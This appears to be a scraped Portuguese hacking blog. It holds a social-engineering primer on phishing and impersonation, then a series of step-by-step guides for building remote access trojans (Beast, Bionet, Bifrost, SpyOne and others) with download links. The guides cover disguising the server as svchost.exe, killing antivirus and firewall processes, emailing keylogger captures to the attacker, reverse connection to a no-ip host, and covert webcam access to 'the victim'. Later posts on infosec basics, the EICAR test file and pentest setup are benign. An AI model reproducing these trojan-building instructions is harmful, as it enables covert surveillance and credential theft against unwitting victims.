hackerabsoluto.webnode.page

Engenharia Social

Thu, 18 Oct 2012 12:36:00 +0200

Introdução

Engenharia Social Consiste em Técnicas Utilizadas por Pessoas com o Objetivo de Obter Acesso e Informações Importantes e/ou Sigilosas em Organizações ou Sistemas por Meio da Ilusão ou Exploração da Confiança das Pessoas. Para isso o Engenheiro Social (Atacante) Pode se Passar por Outra Pessoa, Assumir Outra Personalidade, Fingir Que é Profissional de Determinada Área, Dentre Outros. Esta é uma Forma de Entrar em Organizações Muito Facilmente, Pois Não Necessita da Força Bruta ou de Erros em Máquinas, A Engenharia Social Explora Sofisticadamente as Falhas de Segurança Humanas, Que Por Falta de Treinamento Para esses Ataques, Podem ser Facilmente Manipuladas. As Vítimas de Engenharia Social É Importante Ressaltar Que, Independente do Hardware, Software e Plataforma Utilizada, O Elemento de Maior Vulnerabilidade em Qualquer Sistema é o ser Humano, por Possuir Traços Comportamentais e Psicológicos que o Torna Susceptível a Ataques de Engenharia Social. Dentre Essas Características, Podem-se Destacar:

• Vontade de ser Útil: O Ser Humano, Comumente, Procura Agir com Cortesia, Bem Como Ajudar Outros Quando Necessário.

• Busca por Novas Amizades: O ser Humano Costuma se Agradar e Sentir-se Bem Quando Elogiado, Ficando Mais Vulnerável e Aberto a Fornecer Informações.

• Propagação de Responsabilidade: Trata-se da Situação na Qual o ser Humano Considera que Ele Não é o Único Responsável por um Conjunto de Atividades.

• Persuasão: Compreende Quase uma Arte a Capacidade de Convencer Pessoas, Onde se Busca Obter Respostas Específicas. Isto é Possível Porque as Pessoas têm Características Comportamentais que as Tornam Vulneráveis à Manipulação.

Técnicas

Praticamente Todas as Técnicas de Engenharia Social Consistem em Obter Informações Privilegiadas Iludindo os Usuários de um Determinado Sistema Através de Identificações Falsas, Aquisição de Carisma e Confiança da Vítima. Ao Realizar o Ataque, o Atacante Pode Fazer Uso de Qualquer Meio de Comunicação. Tendo-se Destaque Para Telefonemas, Conversas Diretas Com a Vítima, e-mail e msn e Outros. Algumas Dessas Técnicas São:

e-mails Que Contenham Vírus Neste Caso a Engenharia Social Atua Através do Assunto Contido nos e-mails, Cuja Função é Iludir os Receptores, O Assunto Pode Estar Relacionado à Amizade, Sexo, Amor, Noticias Atuais Dentre Outros Muitos. Quando a Vítima Recebe este e-mail ela Torna-se Vulnerável Por Acreditar que a Mensagem Realmente Contenha Algo Sobre Tal Assunto, Vindo Assim a Abrir e Executar o Anexo que Então Contém o Vírus. A Função do Engenheiro Social Neste Caso Será Criar uma Mensagem Capaz de Convencer o Receptor Sobre Sua Veracidade Despertando Assim sua Curiosidade Fazendo-o Executar o Anexo ou Clicar Em Um Link. E-mails Falsos Este Tipo de Ataque Envolve a Engenharia Social, Pois Explora a Confiança dos Receptores de Tais e-mails. Estes na Maioria das Vezes Visam Obter Informações Financeiras, Como por Exemplo, Senhas, Números de Contas e etc.

O Trabalho do Engenheiro Social Neste Caso é, Como Dito no Exemplo Acima, Clonar um Site (Pagina Fake) de uma Instituição Financeira e Fazer com que a Pessoa Receptora Digite ali as Informações que lhe são Necessárias. Muitas Vezes o Engenheiro Social faz uso de Artifícios como, por Exemplo, Promoções, Premiações e etc, Que na Verdade Nunca Vieram a Existir. O Atacante por Meio de e-mail Envia como Conteúdo Estes Artifícios Juntamente com um link Direcionando à Pessoa Atacada para um Site Falso, e Será Neste Site que ele Obterá as Informações Desejadas, Caso Obtenha Sucesso no seu Ataque.

Qualificação Dos Ataques

Abordaremos Aqui os Tipos de Ataques Realizados pelo Engenheiro Social.

Basicamente são dois os Tipos de Ataques Desenvolvidos, os Denominados Ataques Diretos e os Ataques Indiretos. O Ataque Direto é Caracterizado Pelo Contato Pessoal, este Geralmente é Realizado por Fax, Telefone ou Até Mesmo Pessoalmente, o Que Exige do Atacante um Plano Antecipado e Detalhado, Um Plano de Emergência, Caso Algo Venha a Dar Errado, Além de um Pouco de Dom Artístico, Pois o Engenheiro Social deve Acima de Tudo ser bem Articulado para Evitar que seu Plano seja Desmascarado.

Caracteriza-se Ataque Indireto Aquele que Utiliza-se de Ferramentas de Invasão (Trojans, Keyloggers, Worms e Outros) e de Impostura (Spam, Sites Falsos) para Obter as Informações Necessárias. Métodos Utilizados Pelo Atacante Os Principais Métodos Utilizados pelos Engenheiros Sociais para Realizarem seus Ataques São: Pesquisa e Impostura. Refere-se à Coleta de Materiais, Como Relatórios, Listas de Pagamentos e Etc. A Finalidade Deste Método é Descobrir Quem Guarda as Informações e Quais São Elas. Sabendo-se Disso o Próximo Passo é Elaborar Meios Para Extrair Tais Dados de Tais Pessoas, É Neste Momento que Surge a Impostura. Impostura Este Método Visa Realizar um Ataque Direto, Fazendo-se Passar por Outras Pessoas, Como Funcionário da Própria Empresa, Clientes, Fornecedores e Etc. Figuras da Engenharia Social São Várias as Figuras Encontradas em um Ataque de Engenharia Social, Algumas Utilizadas Apenas na Fase de Coleta de Informações, Outras Utilizadas Apenas na Fase de Ataque Direto e por fim Algumas que são Utilizadas Durante Todo o Processo de Realização do Ataque, Dentre elas Podemos Destacar:

Disfarces

Geralmente os Disfarces são Utilizados Durante Todo o Processo de Ataque, Seja Como Faxineiro Durante o Processo de Coleta das Informações ou Como Consultor em Visita Durante um Ataque Direto. São Poucas as Empresas que se Preocupam com o Destino do Lixo que é Gerado em seu Ambiente, Tornando-o Assim uma Fonte Potencial de Informações para os Engenheiros Sociais, Pois Nele Podem ser Encontrados Relatórios, Anotações de Senhas, Informações Sobre o Patrimônio da Empresa Dentre Outras. Funcionários Descontentes e Redes de Contatos Por Via das Vezes Essa é uma das Formas Mais Fáceis de Obter Informações Dentro de Uma Empresa. Funcionários Insatisfeitos na Maioria das Vezes Acabam por Fornecer Informações Importantes, as Quais Podem Prejudicar Seus Superiores ou Toda a Organização, Além de Possuírem uma Rede de Contatos Dentro e Fora (Fornecedores) da Organização, o que Torna-se Válido Pois Estes Podem Fornecer Informações Valiosas Sobre Outras Pessoas e Sobre Caminhos Para Chegar a Mais Dados. Apelo Sentimental Muitas Vezes é Realizado no Mundo Virtual (Chats), Pois o Atacante Pode, Por Exemplo, Transformar-se em Homem ou Mulher para Atrair e Conquistar a Confiança da Pessoa Atacada, Subtraindo Assim Informações Importantes. Programação Neurolinguística Uma Das Técnicas Mais Utilizadas Nesta Fase Chama-se Acompanha-Acompanha-Acompanha-Comanda, Seu Objetivo é Confundir a Vítima. Neste Método, o Atacante Imita os Trejeitos de seu Interlocutor por um Determinado Tempo Até que Forme-se um Elo de Intimidade e a Vítima Imagine Estar no Comando, Baixando a Guarda. Deste Momento em Diante o Atacante Comanda a Conversa Sem Que a Vítima Perceba, sugando Assim Todas as Informações que ela Detém.

A Utilização da Internet

Vários Atacantes Formulam Sites Afim de Obter Dados Pessoais e Noções Sobre o Comportamento de Suas Futuras Vítimas. Para Isso, Oferecem Para a Realização do Cadastro Brindes, Participação em Promoções e Etc. Desta Forma Conseguem Obter, Por Exemplo, Números de CPF, RG e Cartões de Crédito e Como se Proteger da Engenharia Social

Bom Senso a Vítima Deve Ficar Sempre Bem Atenta ao Receber Qualquer Tipo de Abordagem, Seja por Telefone, e-mail, Carta ou até Mesmo Pessoalmente, Onde umA Pessoa (Atacante) Tenta o Induzir a Fornecer Informações Confidenciais Pessoais e Até Mesmo Sobre a Empresa em que Trabalha. Informações Sensíveis Deve-se Sempre Estar Antenado Quando lhe for Solicitado Informações Sensíveis Como, Por Exemplo, Números de Cartões de Crédito, Senhas e Etc. Por Pessoas Estranhas. A Vítima Antes de Tudo Deve Verificar a Autenticidade da Ligação que Esta Recebendo, Do Crachá que o Atacante Apresentou e Etc. Solicitações Pela Internet Nunca Fornecer Informações Pessoais, de Empresas, Organizações e Etc Antes de Identificar e Constatar a Autenticidade do Pedido. Por Várias Vezes, Vítimas Recebem e-mails Contendo Links Falsos, Informações Não Verdadeiras ou Até Mesmo Solicitações de Cadastro em Empresas Fantasmas. Para Não Cair Nestas Armadilhas a Vítima Deve, Por Exemplo, Entrar em Contato Com a Instituição Que Lhe Fez a Solicitação de Cadastro, Como por Exemplo Bancos, Receita Federal e Etc, Para Garantir Assim uma Autenticidade do Pedido, Nunca Clicar Sobre Links Recebidos Através de Spams e Etc. Treinamento, Atualmente as Empresas Que Querem Evitar Esse Tipo de Ataque, Estão Investindo Alto em Treinamento de Funcionários, Afim de Evitar a Vazão de Informações Sobre a Estrutura da Empresa

Poderar gostar de;

TROJAN FLUX

Thu, 18 Oct 2012 12:18:00 +0200

Trojan Flux V1.0.1

trojan de coneção reversa com keylogger e diversas funçoes...

Configurando

Na opção Ports 2001 (marque) pra ativar a listagem Options -> Settings Coloque uma Senha em Password ->Marque enable Keylogger on connect Marque AutoListen on Startup

Criando o Server

File -> new Server ->

Installation Escolha onde sera instalado o servidor assim que executado pela vitima windows ou system e coloque o nome ->ex:svchost.exe

Startup

-Marque AutoStart With Windows (Serve para Iniciar o server junto com o windows)

-Key (escreva msgmsgr.exe ou ...)

-Marque Persistent Server

-Melt Server After Install (é opcional , serve para sumir Instalador do server assim que executado)

Identification

-Group (escolha um nome ou deixe como esta)

-Name (escolha um nome)

Firewall Bypassing

-Marque Default Browser e escreva iexplorer.exe -Marque MSN Messenger e escreva msnmsgr.exe -Marque Specified Application(s) escreva explorer.exe

Connection

-Connect to port (deixa 2001)

-password (coloque a senha)

Connect to Ip

-Coloque sua conta no-ip , ex-> xxxx.no-ip.org

-Receive IP From URL Coloque http://seu no-ip ex-> http://xxxx.no-ip.org

-Encryption Key (coloque qualquer coisa

Compress server

(é opcional) se for passar themida ou ... desmarque esta opção.

Save e Pronto

Baixar Arquivo

Poderar gostar de;

TROJAN ERAZER

Thu, 18 Oct 2012 12:14:00 +0200

Criando o Server

* Clique em build new server

* em conection (escolhe reverse conection ou direct conection) se escolher reverse conection , em host name (coloque seu no-ip)

*porta deixe como esta (porta 80)

*timeout deixe como esta 10sec

* Em Intalation

deixe marcado as duas opçoes [Install e FWB]

*install folder é o diretorio onde sera instalado (fica a sua opção[windows folder ou system folder]

*deixe marcado Melt se quiser que o instalador do servidor desapareça quando for executado.

* Em Packer Deixe como esta [no packer / own packer] para puder proteger com themida

* Build para salvar seu server

* Pronto seu server esta criado.

Baixar Arquivo

Poderar gostar de;

Trojan dark Moon

Thu, 18 Oct 2012 12:12:00 +0200

* Trojan de coneção reversa e direta.

* Disponivel somente no idioma ingles (mas facil de usar)

* Acesso remoto total ao PC da Vitima

* Inclusive webcam da vitima sem que ela veja!

* com direito a criação do server,escolha do icone,podendo juntar com outro programa

* Com keylogger

* E mais...

Baixar Arquivo

Poderar gostar de;

TROJAN DARK GIRL

Thu, 18 Oct 2012 12:10:00 +0200

* Trojan de coneção direta

* Em portugues

* Contem apenas dois arquivos ( Cliente e server )

* Acesso remoto ao PC da Vitima

* Inclusive webcam da vitima sem que ela veja!

* E mais...

* Conecta facil

* é so enviar o server que ja vem pronto a vitima!

Baixar Arquivo

Poderar gostar de;

TROJAN BEAST

Thu, 18 Oct 2012 12:06:00 +0200

***Criando o Server***

*Abra o Cliente...

*Depois de Aberto Clique em "BUILD SERVE"

*Marque a Opção Reverse Conection

*Syn Port Deixe a Porta que Esta.

*''Password" Coloque uma Senha(Para o Uso da Conexão Direta).

*Em Server Name Coloque svchost.exe ou explorer.exe ou Outro Processo que Fique Dificil a Visulização e Identificação do Mesmo...

*Marque a Opção Reside in "SYSTEM".

*Marque a Opção "INJECT IN EXPLORER.EXE''

*Em Notifications ->IP DNS ->Coloque sua Conta NO-IP

*E em Startup Desmarque a Opção ActiveX.

*Agora Vá Para AV-FW Kill, Marque a Opção kill AV - FW on start.

*Vá para Misc, e Marque "Clean Restore Point (XP)" Também Enable Keylogger.

*Abaixo de Enable Keylogger Clique em Configure, e em "SEND IT AT" Digite o Seu e-mail , e Abaixo Digite o smtp do seu Provedor de e-mail.

*E Também Marque a Opção"ENABLE SMART KEYLOGGER" e Clique em OK.

*Se Você Quiser Mensagem de Erro na Hora da Execução do Server "FAKE ERROR MESSAGE"

*Depois Vá Para Exe Icon,Escolha um Icone ,

Depois Clique Em "Save Server"

Baixar Arquivo

Poderar gostar de;

BIONET

Thu, 18 Oct 2012 12:03:00 +0200

Coneção reversa ou Direta

Abrindo o editor do Bionet em main

*general ->

-coloque o nome do server em Server name

-em serv password colque uma senha

-marque a opção Stealth mode (modo oculto)

-marque use random ports

-marque melt server (é opcional)

(Para o server sumir assim que executado)

*Startup ->

-em File Name é o nome do server no sistema Marque e escreva svchost.exe ou explorer.exe , -> lembrando que o nome do processo fica opcional de cada um!

-em Key Name é o nome da chave do server ,deixe como esta , mas é opicional tb.

*Stealth ->

-Marque Enable This Feature! ,se quiser que o server de uma mensagem de erro ao ser executado (é opcional de cada um , cada um tem sua propria engenharia. )

se marcar esta opção em ->

_error massage body coloque o nome do erro e

_error message title coloque a sua mensagem e tem o botão test se quiser ver como ficou a mensagem.

-em AntiVirus / Firewall work arounds

marque a opção dont run para desabilitar o firewall

* ICQ Notification ->

-desmarque tudo

*Static IP Notification ->

-Marque enable this feature é a opção de coneção reversa.

-Ip Adress colque sua conta no-ip

-Port deixa como esta porta 600

*Keylogger ->

-marque a opção enable offline logging

-marque enable leylog emailer

-em to coloque seu e-mail

-em server coloque mx4.mail.yahoo.com ,se for yahoo,se for outro veja o servidor

-em port deixa smtp se for yahoo , se for outra veja o servidor

*Advanced ->

-BioNet Engine desmarque a opção enable compression para poder proteger com themida.

se não for passar themida deixa marcada a opção

-Emailer colque seu e-mail

-deixe marcado allow plugins para total funcionamento -no run lins tem mais de 30 processos ,

insira o maximo de processos que conheça manualmente cancela inicialização do firewall zonealarme e processos dele como vsmon.exe cancela o processos ccleaner cancela processos do anti-trojan cancela o processo do kaspersky avp.exe cancela processos do norton NAVAPW32.EXE NAVW32.EXE entre outros ,

-podendo adicionar mais processos manualmente.

Baixar Arquivo

Poderar gostar de;

BIFROST V 1.2

Thu, 18 Oct 2012 12:01:00 +0200

CONFIGURAÇÕES BASICAS:

*Settings

-As Portas a serem usadas : 80 200 123.

-Em Password escolha uma senha.

-E o resto deixe tudo marcado e de um Ok.

*CRIANDO SERVER

*Clique em "Builder"

*Aba Connection

-Em Dynamic DNS/IP coloque o Host da sua conta na No-IP e clique em Add.

-Password coloque uma senha.

-E em Port 81.

*Aba Installation

-Em Filename When Installed coloque win32.exe

-Logo abaixo em Directory To Install é opcional coloque windows ou system32.eu dou preferencia a system32

-E marque a opção System Directory.

Deixe marcado Autostart At Reboot.

-Logo depois deixe marcado tambem: Include Extension Pack, Offline Keylogger, Exclude Shift And Ctrl.

-Em baixo em Injection escreva svchost.exe ou explorer.exe ou ...

-Agora em Mutex Name coloque: bif123

-Registry Key: win32

-Assigned Name: Nome para sua vítima.

*Aba Stealth

-Apenas deixe marcado as seguintes opções: Cautious Mode, Set Attribute Hidden, Set Older File Date, Melt Server é opcional (assim que executado some o instalador.)

-O resto deixe desmarcado.

*Aba Miscellaneous

-Não meixa em nada, apenas clique em Build, e o Server será criado na msm pasta do bifrost.

Baixar Arquivo

Poderar gostar de;

SpyOne V1.1

Thu, 18 Oct 2012 11:56:00 +0200

SpyOne V1.1

* Trojan de Coneção Reversa

* Muito Facil de Usar.

* Em Portugues

* Acesso Remoto ao PC da Vitima

* Inclusive webcam!

* E muito Mais...

* Conecta Facil

--> Criando Server

*Va Em New Server

*Em Seu DNS -> Coloca Sua Conta No-Ip

*Porta 888 -> Deixa esta Mesmo 888

*Em Nome -> Coloca Um Nome Qualquer

*Em Entrar Em -> Desmarca a Opção Bloco De Notas e a Opção Comprimir e Marque Apenas a Opção Explorer.

*Em Inicialização -> Desmarque a Opção Startup ActiveX e Deixe Marcado as Demais Opções (obs-> a Opção =Melt é Opcional, Serve para Excluir o Instalador Apos Instalado no Sistema. )

*Va Em Criar Server PRONTO!!!

Seu Server Do Spyone Está Criado. Proteja com um Crypter e Pronto.

Senha para descompactar --> twi-fabiogrunge%

Baixar Arquivo

Poderar gostar de;

SPYONE V1.0.2

Thu, 18 Oct 2012 11:50:00 +0200

SPYONE V1.0.2

* Trojan de coneção reversa com KeyLogger

* Muito facil de usar.

* Acesso remoto ao PC da Vitima

* Inclusive webcam da vitima sem que ela veja! *

E muito mais...

Criando Server

*Va Em Build Server

->Connection

*Em Seu DNS/IP Adress -> Coloca Sua Conta No-Ip

*Em Syn Port Deixe a Porta Porta 995

->Startup

*Start Key ->Coloque um processo do windows ,assim fica mais dificil de identificar EX->svchost.exe , explorer.exe , Issas.exe , System ...

*Registry Run Local Machine -> Deixe Marcado

*Startup ActiveXKey é Opcional , Mas eu Deixo marcado.

->Instalation

*FileName When Instaled ->Coloque um Nome Ex->svchost.exe ou ...

*Assingned name ID -> Coloque um Nome Qualquer

*Escolha o Local da Instalação (Windows ou System32)Eu dou preferencia a pasta System32 Por Contem Mais Componentes e Fica mais Dificil de Achar

*Marque Persistent Server

*A Opção Melt é Opcional (Faz Sumir o Server Apos Executado)

->Marque a Opção KeyLogger

->Desmarque a Opção AutoPack Server (Para Proteger com themida ou outro...)

->Build Para Criar o Server

Baixar Arquivo

Poderar gostar de;

Teste Seu Anti-Virus

Thu, 18 Oct 2012 11:34:00 +0200

Teste Seu Anti-Virus

Teste 1

Eicar (Um Teste Tradicional e Antigo)

Copie o codigo e cole no seu editor ou bloco de notas

e salve na extensão .com

exemplo -> nome.com

O anti-virus nem deixara salvar , se deixar e so escanear o arquivo.

X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*

Teste 2

Clique Em Uma Das imagens Abaixo

Seu Anti-Virus devera Detectar a Pagina.E Não Deixar A Pagina Ser Aberta.

Teste 3

Seu Anti-Virus Devera detectar

antes que a pagina abra!

Teste Atualizado...

Se seu AntiVirus deixar a pagina abrir

(Troque o Anti-Virus)

Poderar gostar de;

Teste Seu Firewall

Thu, 18 Oct 2012 11:30:00 +0200

TESTE SEU FIREWALL

Veja o Funcionamento do seu Firewall.

Tenha Certeza que seu Firewall esta Realmente Protegendo seu PC.

Faça um Teste Online

Entre no Site ShieldsUP

https://www.grc.com/x/ne.dll?bh0bkyd2

*Clique no botão "Proceed"

*Clique no botão "All Service Ports"

Parametros ->

Verde = Portas invísiveis

Azul = Porta fechada

Vermelho = Porta aberta

Poderar gostar de;

Segurança da Informação

Tue, 07 Aug 2012 12:45:00 +0200

O que é segurança da informação?

Veja aqui um conjunto de boas práticas de mercado para desenvolver uma política e uma cultura de segurança, essencial para qualquer tipo de empresa.

Por Marcos Vinícius da Silva Junior

O ativo mais valioso para uma organização ou pessoa é a informação. Este grande diferencial competitivo então deve estar disponível apenas para as pessoas de direito. Elaborar e garantir critérios que protejam estas informações contra fraudes, roubos ou vazamentos nas empresas são responsabilidades e habilidades dos gestores e analistas de segurança da informação.

Nessa cartilha você vai encontrar alguns passos e ideias de como entregar e melhorar resultados.

O que um departamento de segurança da informação faz?

As atividades de segurança da informação englobam o desenho, implementação, controle e monitoração de métodos e processos que visam assegurar os ativos de informação de uma organização ou pessoa.

Sua atuação numa empresa está diretamente envolvida com as áreas de negócio, principalmente com a área de tecnologia, uma vez que esta sustenta a maioria dos processos de negócio da empresa.

A sinergia da área com os projetos e departamentos da organização é caráter fundamental para a boa prática da segurança da informação no ambiente corporativo.

Para desenvolver uma política e uma cultura de segurança da informação, a TI precisa antes garantir a entrega dos recursos e da informação para os usuários, além de mantê-los íntegros e confidenciais.

As informações de negócio de uma organização estão dispostas em um complexo ecossistema formado por processos de negócio, pessoas e tecnologia.

Para garantir a continuidade do negócio de uma organização, é preciso assegurar que cada membro deste ecossistema esteja em conformidade com normas internas criadas pela própria organização e normatizações externas, nacionais e internacionais.

Vamos apresentar aqui um conjunto de boas práticas de mercado que ajuda a manter todos os recursos disponíveis e seguros para as tomadas de decisão da organização. Cada organização tem seu core businness e para cada um podemos olhar e encontrar particularidades que devemos trabalhar para garanti-las também.

Mas o principal objetivo nunca muda e em todos os programas de desenvolvimento de uma política e cultura de segurança da informação vamos encontrar estes três itens:

Garantir disponibilidade dos recursos/informação;

Garantir integridade da informação;

Garantir confidencialidade da informação.

Garantindo a disponibilidade dos recursos

Recursos de informação como dados, servidores, aplicações, equipamentos de telecom devem estar disponíveis à demanda e necessidade do negócio. É preciso mapear quais são estes ativos principais – críticos – para o negócio e controlar as necessidades de atualizações de toda esta infraestrutura a fim de minimizar paradas no ambiente.

Estas paradas ainda podem ser causadas por variáveis não controláveis como falhas de hardware, problemas de software, ataques a rede computacional, ausência de recursos humanos, entre outras.

Para estas devemos ter o cuidado de procurar desenvolver processos detalhados para suprir quaisquer problemas que a organização possa enfrentar, quais os impactos de uma falha e quais as atitudes a serem tomadas no caso de indisponibilidade de um recurso.

Este assunto é trabalhado dentro de um item chamado de Gerenciamento de Riscos. Seguinte a isso encontramos por exemplo o Plano de Recuperação de Desastres (ou DRP, de Disaster Recovery Plan). Os principais itens trabalhados num plano de projeto para manutenção e disponibilidade de recursos, sobretudo tecnológicos são:

Prevenção e detecção de ameaças a rede computacional, também monitoração e controle da rede;

Definição de políticas e processos de uso de recursos de rede;

Desativamento de recursos e serviços não necessários em servidores e aplicações;

Ajuste fino de servidores e aplicações (Hardening);

Cuidados com gerenciamento de identidades e controles de acesso a rede;

Definição de um plano para aplicação de patches e atualizações no ambiente;

Definição de um plano de contingência para os recursos e um plano para recuperação de desastres.

Garantindo a integridade da informação

Entende-se em garantir integridade da informação o trabalho de colocá-la disponível aos recursos que a utilizarão na forma de sua última versão válida. O principal item desta etapa que eu gostaria de trabalhar aqui são os processos de auditoria, essenciais para a garantia de integridade das informações e recursos da organização.

Os principais objetivos desta etapa são entender os métodos como processos de negócio são aprovados e repassados, quem são seus proprietários/responsáveis e usuários e buscar ferramentas para monitorar e controlar estas alterações a fim de garantir a integridade.

Recursos como firewalls, antivírus, criptografia, assinatura digital, backup, processos e outras ferramentas devem ser usadas para garantir o bom funcionamento do ambiente.

Garantindo a confidencialidade da informação

Este último tópico, porém não menos importante, é resultante do trabalho já realizado nos tópicos anteriores. Onde através de processos e ferramentas buscamos entender e mapear todos os recursos e acima de tudo assegurar as informações estratégicas para o negócio da organização.

As informações devem estar disponíveis apenas a pessoas e/ou outros recursos que tenham direito a elas. Com isso em mente podemos trabalhar para minimizar ataques a rede computacional da empresa, vazamento de dados através do envio de informações de negócio sem autorização por e-mails, impressões, cópias em dispositivos móveis, também acesso a informações de projetos e departamentos armazenadas em servidores por pessoas não autorizadas.

Sem esquecer as variáveis incontroláveis que também estão presentes aqui, como por exemplo possíveis perdas ou furtos de dispositivos como notebooks, smartphones e pendrives que porventura possam conter informações confidenciais.

Mudança de paradigma

Primeiro vamos começar quebrando um paradigma. No começo da informática era fácil encontrar os ativos digitais de uma empresa. Eles ficavam num lugar chamado de CPD (Central de Processamento de Dados). Hoje a coisa complicou muito! Podemos encontrar informações das empresas circulando em notebooks, fitas de backups, pendrives, smartphones, e-mails etc.

Como garantir o bom uso e a segurança das informações críticas para o negócio agora? Apenas um firewall protegendo a rede já não adianta mais, pois os dados estão circulando por diversos meios, em diversos estados e até fora do perímetro da organização.

Através do uso de processos e tecnologia, a área de segurança da informação hoje pode entregar resultados fantásticos para as empresas diminuindo sensivelmente os riscos para o negocio.

Classificação da informação

Todo ativo de informação deve ter um gestor como responsável para aprovação e controle.

A classificação da informação deve ficar evidente e de fácil reconhecimento pelo usuário ou colaborador, para que este possa utilizar e compartilhar o recurso apenas com as áreas de negócio que tenham acesso.

Este mapeamento deve ser organizado e gerenciado por um comitê de segurança da informação e os ativos avaliados, digitais ou não, devem ser entendidos junto a seus proprietário e usuários, para a obtenção de melhores resultados.

Ativos digitais críticos para a organização (como projetos estratégicos, planilhas financeiras, relatório de vendas etc.) são algumas das informações estratégicas mais comuns e sensíveis para as empresas – e sua segurança merece total atenção.

? Confidencial – informações e recursos disponíveis a projetos e trabalhos críticos para a continuidade do negócio da organização.

? Uso interno – informações e recursos disponíveis e gerados por departamentos e grupos de projeto, de uso restrito dentro da organização.

? Uso público – informações que podem ou devem ser divulgadas, a fornecedores, colaboradores externos, mídias de publicidade, etc.

Entendendo os diferentes estados da informação

? Armazenada: são considerados dados armazenados os que residem em notebooks, desktops e servidores;

? Em movimento: são considerados dados em movimento os que residem em pen drives, smartphones, CDs e e-mails;

? Em uso: são considerados dados em uso os que se encontram em estado de processamento (sistemas de e-commerce, bancos de dados, ERPs etc.).

Administração e controle de senhas

Usuários e senhas já fazem parte do dia-a-dia de todos, é o que utilizamos isto para acessar a conta do banco, o sistema da empresa, o computador de casa, etc. Garantir a segurança e o bom uso destas identidades é crucial para evitarmos vazamento ou roubo de informações.

A maioria dos softwares que requerem algum tipo de autenticação para administração da ferramenta e/ou uso de outros perfis utilizam de um conjunto formado por um nome de usuário e uma senha, como “Administrator” “senha” “password” “pass” entre outros.

A mudança do nome destes usuários e senhas padrão nas ferramentas deve ocorrer se possível logo ao término da sua instalação.

Faça uma senha longa o suficiente. Uma boa senha possui de 8 a 12 dígitos. E quanto mais longa, melhor.

Não utilize palavras e nomes conhecidos. Programas de quebra de senha possuem uma base bastante aprimorada com diversos dicionários, a fim de testar cada uma destas palavras e tentar então quebrar esta senha.

Utilize caracteres alfanuméricos como números, pontuação além de também alternar entre letras maiúsculas e minúsculas.

Evite anotar suas senhas em papéis ou divulgar para outras pessoas. Trabalhe num conjunto de caracteres que possam representar simbolicamente algo para você e que possa ser facilmente lembrado.

Use senhas diferentes para suas contas. Obviamente é mais cômodo ter apenas uma boa senha, mas em caso de furto ou vazamento, todas as contas e sistemas que você utilizam desta senha para acesso poderão ser facilmente acessados por quem se beneficiar.

Mude suas senhas com frequência. Isto com certeza pode ajudar no caso de alguém estar bisbilhotando alguma conta sua particular ou na sua empresa e não estiver deixando rastros.

Sempre que possível utilize criptografia. Com isso você pode garantir que apenas as pessoas autorizadas possam ter acesso a suas contas e informações.

Gestão de identidades e acessos

O bom desenho da infraestrutura computacional e processos de tecnologia é de extrema importância para o controle dos acesso aos ativos de informação.

Todas as mudanças nos perfis de acesso dos colaboradores devem ser documentadas e estes registros devem ficar disponíveis para futuras consultas e auditorias.

A área de segurança da informação deve garantir o cumprimento dos prazos e controles para validação e concessão dos acessos.

Mudança cultural

A política de segurança da informação deve ser divulgada e de fácil acesso pelos colaboradores. Workshops e treinamentos são boas maneiras de divulgá-la e orientar os usuários de como a área de segurança da informação está trabalhando para proteger os ativos de informação da empresa e quais são as responsabilidades dos colaboradores dentro deste ecossistema.

Como é certo dizer que hoje qualquer processo de negócio de uma empresa depende de tecnologia e informação, a forma não mais fácil, porém melhor, de garantir interação da área de segurança da informação para cumprimento da política é orientar que cada projeto ou área de negócio da empresa comunique e solicite colaboração para avaliação de riscos e implementação de controles. O contrário disso pode demandar um esforço de “venda” das atividades na empresa que seguramente não apresentará bons resultados no final de cada trabalho.

Fonte: Webinsider

Poderar gostar de;

O que é o Pen Test ASCD

Mon, 26 Mar 2012 14:48:00 +0200

O que é o PEN TEST ASCD

O pentest ASCD é um teste de intrusão realizado no final do curso ASCD, onde o aluno irá invadir um sistema vulneravel o objetivo não é apenas conseguir controle total ao sistema remoto, mas tambem fazer um relatorio das falhas encontradas e sugerir soluções para as vulnerabilidades.

Este tutorial é para os alunos do curso ASCD que irão realizar o Pentest atraves do Windows 7 ou Vista.

As versões do Windows Vista e Seven não são recomendadas para realização de pent-test, nestas versões são quase que basicamente sistemas para descktops, o ideal seria Linux ou no minimo windows XP. Mas podemos adaptar o Windows 7 para a realização de pentest ASCD, precisaremosativar alguns recursos e instalar algums programas.

TELNET

Por padrão o telnet não está ativado no Windows 7, veja:

Devemos ativá-lo para realizar o pentest

1-)Clique em Iniciar e em Painel de Controle.

2-)Na página Página Inicial do Painel de Controle, clique em Programas.

3-)Na seção Programas e Recursos, clique em Ativar ou desativar recursos do Windows.

4-)Caso a caixa de diálogo Controle de Conta de Usuário apareça, confirme se a ação exibida é a desejada e clique em Continuar.

5-)Na lista Recursos do Windows, selecione Cliente Telnet e clique em OK.

Veja que agora o telnet está tivado:

EXPLOITS.

É muito importante que voce tenha o active perl instalado em seu computador. Assim voce poderá utilizar exploits em Perl.

Download:
http://www.activestate.com/activeperl/downloads

IPSCAN
O Windows não oferece nenhum ferramenta de IP scan, como no windows 7 nao temos o Insecuritynet 3.X, vamos usar um outro programa para fazer os scans de portas. (FreePortScanner)

Download
http://www.insecuritynet.com.br/downloads/free_port_scanner.rar

Site do fabricante:
http://www.nsauditor.com/

O programa é simples, digite o IP do coputador alvo, escolha as portas e deixe o programa encontrar as portas abertas.

AREA DE CONEXÃO REMOTA

Infelismente o Windows 7 não da suporte para conexão a área de conexao remota do Windows XP (no caso nosso computador alvo), este tipo de conexão em nossa pentest será possível apenas com outro windows XP.

DICA IMPORTANTE

Lembre-se que as ferramentas acima serão apenas intrumentos para você demostrar sua criatividade e seu conhecimento adiquirido, o sucesso do pentest não dependerá de qual ferramenta está sendo usada, mas sim de seu conhecimento.

Poderar gostar de;

Pen Test ASCD

Mon, 26 Mar 2012 14:41:00 +0200

O que é o PEN TEST ASCD

Poderar gostar de;

Como Instalar o Linux no Windows

Sun, 25 Mar 2012 02:57:00 +0200

Para que não sabe Instalar:

1. Unzip do ficheiro cygwin1.5.5-1.zip para um directório temporário – c:temp

2. Executar o programa setup.exe

3. Pressionar o botão next

4. Escolher “Install from Local Directory” e pressioanr o botão next

5. Escolher um directório para a instalação (Root Directory) do cygwin – c:cygwin – e deixar as restantes opçoes inalteradas

Depois disso, basta seguir os passos para instalar o programa, e depois. irá aparecer um console no seu desktop.

Depois disso basta usar seu console linux e abuzar de tudo

O Cygwin e grátis e pode ser encontrado em www.cygwin.com.

